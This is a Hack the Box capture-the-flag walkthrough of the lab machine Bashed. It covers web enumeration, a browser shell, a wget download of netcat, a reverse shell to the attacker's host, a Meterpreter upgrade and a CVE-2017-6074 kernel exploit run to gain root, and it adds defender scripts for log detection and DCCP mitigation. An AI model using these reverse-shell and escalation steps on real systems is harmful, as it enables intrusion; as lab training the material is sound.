Bashed, Hack the Box CTF Walkthrough
Overview
Bashed is a boot-to-root CTF from the Hack the Box archives. This was one of my favorite retired HTB challenges so far. The challenge involves initial compromise through a developer's misconfigured server and requires significantly more work to escalate privileges to root. This challenge forced me to think outside the box for managing shells and was overall a good CTF.
Enumeration
First, I conducted a basic nmap scan to enumerate open ports and services running on the target machine. The scan revealed an Apache web server running on port 80.
┌──(kali㉿kali)-[~/Documents/htb/bashed]
└─$ nmap -sV --top-ports 200 10.10.10.68
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-05 09:06 EST
Nmap scan report for 10.10.10.68
Host is up (0.035s latency).
Not shown: 199 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.05 seconds
Web Application Testing
Next, I launched Burp Suite and a Firefox browser to begin inspecting the target's web application. In the background, I started dirb, a directory brute-forcing tool. The resulting dirb scan revealed a directory called dev.
┌──(kali㉿kali)-[~/Documents/htb/bashed]
└─$ dirb http://10.10.10.68
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Mar 5 09:10:15 2021
URL_BASE: http://10.10.10.68/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.68/ ----
==> DIRECTORY: http://10.10.10.68/css/
==> DIRECTORY: http://10.10.10.68/dev/
==> DIRECTORY: http://10.10.10.68/fonts/
==> DIRECTORY: http://10.10.10.68/images/
+ http://10.10.10.68/index.html (CODE:200|SIZE:7743)
==> DIRECTORY: http://10.10.10.68/js/
==> DIRECTORY: http://10.10.10.68/php/
+ http://10.10.10.68/server-status (CODE:403|SIZE:299)
==> DIRECTORY: http://10.10.10.68/uploads/
Exploit Developer Tools
After reading the index page of the website, I understood the server was also being used to develop the tool phpbash. Browsing the /dev path shows that indeed, a working version of phpbash is running on the target server. The program allows a user to interact with a bash-like terminal through the browser itself. I used this terminal to find the user flag, which was located at /home/arrexel.
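From the defender's side, the two web events in this section (a directory brute-force run and use of a browser shell under /dev/) both leave traces in the Apache access log. The script below is an added example, not part of the walkthrough; it works on constructed combined-format log lines, uses documentation addresses for the clients, and assumes phpbash.php as the script name since the page does not give it.

```shell
#!/bin/sh
# Added example, not part of the walkthrough: the defender's view of the two
# web-side events above in an Apache combined access log, namely a dirb-style
# burst of 404s from one client and requests to PHP under /dev/ or /uploads/,
# where a browser shell such as phpbash would sit (phpbash.php as the script
# name is an assumption). The log lines are constructed; 192.0.2.10 and
# 198.51.100.7 are documentation addresses.
SAMPLE_LOG='192.0.2.10 - - [05/Mar/2021:09:10:15 -0500] "GET /admin HTTP/1.1" 404 299 "-" "Mozilla/5.0"
192.0.2.10 - - [05/Mar/2021:09:10:15 -0500] "GET /backup HTTP/1.1" 404 299 "-" "Mozilla/5.0"
192.0.2.10 - - [05/Mar/2021:09:10:15 -0500] "GET /cgi-bin/ HTTP/1.1" 404 299 "-" "Mozilla/5.0"
192.0.2.10 - - [05/Mar/2021:09:10:16 -0500] "GET /test HTTP/1.1" 404 299 "-" "Mozilla/5.0"
192.0.2.10 - - [05/Mar/2021:09:10:16 -0500] "GET /dev/ HTTP/1.1" 200 1021 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Mar/2021:09:11:02 -0500] "GET /index.html HTTP/1.1" 200 7743 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Mar/2021:09:11:03 -0500] "GET /favicon.ico HTTP/1.1" 404 299 "-" "Mozilla/5.0"
192.0.2.10 - - [05/Mar/2021:09:12:40 -0500] "POST /dev/phpbash.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Mar/2021:09:12:41 -0500] "GET /uploads/logo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"'

# scanners LOG THRESHOLD: print each client with at least THRESHOLD 404s.
# Fields of the combined format: $1 client, $6 method, $7 path, $9 status.
scanners() {
    printf '%s\n' "$1" | awk -v t="$2" '$9 == 404 { n[$1]++ }
        END { for (ip in n) if (n[ip] >= t) print ip }'
}

# shell_hits LOG: print "client method path" for PHP requests under /dev/
# or /uploads/, the two directories the dirb run above exposed.
shell_hits() {
    printf '%s\n' "$1" | awk '$7 ~ /^\/(dev|uploads)\/[^ ]*\.php/ { print $1, $6, $7 }' | tr -d '"'
}

echo "directory brute-force suspects (>= 4 x 404):"
scanners "$SAMPLE_LOG" 4
echo "PHP requests in dev/upload paths:"
shell_hits "$SAMPLE_LOG"
```

Against a live Ubuntu server, pass the contents of /var/log/apache2/access.log instead of SAMPLE_LOG and raise the threshold; the dirb run above generated 4612 requests, so a real scan stands out far more than the constructed sample does.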
Privilege Escalation
To start the privilege escalation process, I wanted to upgrade my shell from the phpBash shell to a meterpreter one. Unfortunately, when trying to send a reverse shell to my attacker machine with netcat, an error message occurred stating that the -e option was not available. This was because the installed version of netcat was the BSD flavor (netcat-openbsd); only the traditional netcat (netcat-traditional) supports the -e option, which is required to send a reverse shell. To get around this, I found a Linux binary version of the traditional netcat. After downloading the binary, I put it in the /var/www/html directory to serve with the Apache web server, then used wget to download the file to the target machine through the dev phpBash terminal.
www-data@bashed:/var/www/html/uploads# wget 10.10.14.13/ncat-d
Next, I started a listener on my attack machine with the multi/handler module in Metasploit to catch the reverse shell.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.13:4444
Once the handler was started, I used the phpBash shell to issue a reverse shell through the uploaded ncat binary.
www-data@bashed:./ncat-d 10.10.14.13 4444 -e /bin/bash
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.13:4444
[*] Command shell session 1 opened (10.10.14.13:4444 -> 10.10.10.68:48554) at 2021-03-05 18:34:33 -0500
Upgrading to Meterpreter Shell
Once I received the reverse shell, I backgrounded it with Ctrl-Z. To upgrade this basic shell to a meterpreter one, I used the multi/manage/shell_to_meterpreter module. After configuring the necessary options, I executed the module and started the meterpreter session.
msf6 post(multi/manage/shell_to_meterpreter) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.14.13:4433
[*] Sending stage (980808 bytes) to 10.10.10.68
[*] Meterpreter session 2 opened (10.10.14.13:4433 -> 10.10.10.68:42086) at 2021-03-05 18:38:50 -0500
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) >
Privilege Escalation via CVE-2017-6074
The last stage to escalate privileges was to find a public exploit that would work against the Linux kernel. Some online research revealed that the Ubuntu 16.04 (Linux 4.4.0-62-generic) kernel being used by the target could be vulnerable to CVE-2017-6074. I downloaded a proof of concept from Exploit-DB. Using GCC, I compiled the exploit, then uploaded it to the target using the upload command back in the meterpreter session.
meterpreter > upload /home/kali/Documents/htb/bashed/CVE-2017-6074
[*] uploading : /home/kali/Documents/htb/bashed/CVE-2017-6074 -> CVE-2017-6074
[*] Uploaded -1.00 B of 23.19 KiB (-0.0%): /home/kali/Documents/htb/bashed/CVE-2017-6074 -> CVE-2017-6074
[*] uploaded : /home/kali/Documents/htb/bashed/CVE-2017-6074 -> CVE-2017-6074
meterpreter > chmod 777 CVE-2017-6074
meterpreter > shell
Process 819 created.
Channel 2 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@bashed:~/html/uploads$
www-data@bashed:~/html/uploads$ whoami
whoami
www-data
www-data@bashed:~/html/uploads$ ./CVE-2017-6074
./CVE-2017-6074
[.] namespace sandbox setup successfully
[.] disabling SMEP & SMAP
[.] scheduling 0xffffffff81064550(0x406e0)
[.] waiting for the timer to execute
[.] done
[.] SMEP & SMAP should be off now
[.] getting root
[.] executing 0x564e7dc912aa
[.] done
[.] should be root now
[.] checking if we got root
[+] got r00t ^_^
[!] don't kill the exploit binary, the kernel will crash
root@bashed:/var/www/html/uploads# whoami
whoami
root
root@bashed:/var/www/html/uploads# cat /root/root.txt
cat /root/root.txt
cc4f0afe3a1026d402ba10329674a8e2
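For the CVE-2017-6074 step, the defender's counterpart is simple: the bug lives in the kernel's DCCP module, so on a host that cannot immediately move to a patched kernel the usual mitigation is to stop that module from loading. The script below is an added example, not part of the walkthrough; it assumes modprobe configuration lives under /etc/modprobe.d (overridable by argument) and reads /proc/modules for the loaded state.

```shell
#!/bin/sh
# Added example (not from the walkthrough). CVE-2017-6074 is a double free in
# the kernel's DCCP implementation, reachable from an unprivileged local
# process that opens a DCCP socket. When DCCP is built as a module (the usual
# distro configuration, Ubuntu included), preventing that module from loading
# removes the code path entirely.
# Assumptions: modprobe config lives in $1 (default /etc/modprobe.d) and the
# loaded-module list is /proc/modules.

# dccp_policy [CONF_DIR] -> hard-disabled | blacklisted-only | not-disabled
# "install dccp /bin/true" (the vendor-recommended line) stops every load
# attempt; a bare "blacklist dccp" only stops alias-based autoloading.
dccp_policy() {
    dir="${1:-/etc/modprobe.d}"
    # strip comments before matching so commented-out lines do not count
    conf=$(cat "$dir"/*.conf 2>/dev/null | sed 's/#.*//')
    if printf '%s\n' "$conf" | grep -Eq '^[[:space:]]*install[[:space:]]+dccp[[:space:]]+/bin/(true|false)[[:space:]]*$'; then
        echo hard-disabled
    elif printf '%s\n' "$conf" | grep -Eq '^[[:space:]]*blacklist[[:space:]]+dccp[[:space:]]*$'; then
        echo blacklisted-only
    else
        echo not-disabled
    fi
}

# dccp_loaded -> exit 0 if the module is in the running kernel right now
dccp_loaded() {
    grep -q '^dccp ' /proc/modules 2>/dev/null
}

# write_dccp_mitigation [CONF_DIR]: drop the hardening line (run as root).
# An already-loaded module still needs "rmmod dccp" or a reboot.
write_dccp_mitigation() {
    printf 'install dccp /bin/true\n' > "${1:-/etc/modprobe.d}/disable-dccp.conf"
}

# report [CONF_DIR]: read-only summary; never changes the host by itself
report() {
    echo "kernel: $(uname -r)"
    echo "modprobe policy for dccp: $(dccp_policy "$1")"
    if dccp_loaded; then echo "dccp module: loaded"; else echo "dccp module: not loaded"; fi
}

report "${1:-/etc/modprobe.d}"
```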